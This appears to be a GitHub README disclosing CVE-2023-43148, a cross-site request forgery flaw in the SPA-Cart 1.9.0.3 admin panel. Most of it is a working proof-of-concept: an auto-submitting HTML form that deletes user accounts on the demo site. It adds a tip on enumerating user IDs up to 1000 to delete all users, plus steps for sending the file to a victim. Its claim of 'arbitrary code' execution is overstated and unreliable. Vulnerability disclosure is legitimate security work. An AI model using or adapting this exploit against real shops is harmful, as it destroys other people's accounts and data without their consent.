MinoTauro2020 / CVE-2023-43148

CVE CSRF DELETE ACCOUNT

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

# CVE-2023-43148
#Author : Aitor Herrero Fuentes

# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/admin
# Version: 1.9.0.3
# Tested on: Windows 10 Pro

CSRF DELETE ALL ACCOUNT

Cross Site Request Forgery vulnerability in application demo.spa-cart.com allows a remote attacker to execute arbitrary code ,  Delete "All Accounts" with one click  
A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code. This code could then be used to delete all accounts

POC

 1 - Make an file with with this CODE and SAVE in HTML 
 Attack Delete  All Account

<html>
  <body>
    <form action="https://demo.spa-cart.com/admin/users/search" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="mode" value="delete" />
      <input type="hidden" name="status&#91;855&#93;" value="1" />
      <input type="hidden" name="status&#91;848&#93;" value="1" />
      <input type="hidden" name="status&#91;857&#93;" value="1" />
      <input type="hidden" name="status&#91;859&#93;" value="1" />
      <input type="hidden" name="status&#91;852&#93;" value="1" />
      <input type="hidden" name="status&#91;850&#93;" value="0" />
      <input type="hidden" name="status&#91;849&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;858&#93;" value="on" />
      <input type="hidden" name="status&#91;858&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;856&#93;" value="on" />
      <input type="hidden" name="status&#91;856&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;854&#93;" value="on" />
      <input type="hidden" name="status&#91;854&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Tip: All user is assigned one id example "status[852]"  complete de html with "status[001]" to status[002] ---etc---etc to arrived to 1000 , with this tip the attacker
can delete all users

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button
the code will changes in his actually session.

About

CVE CSRF DELETE ACCOUNT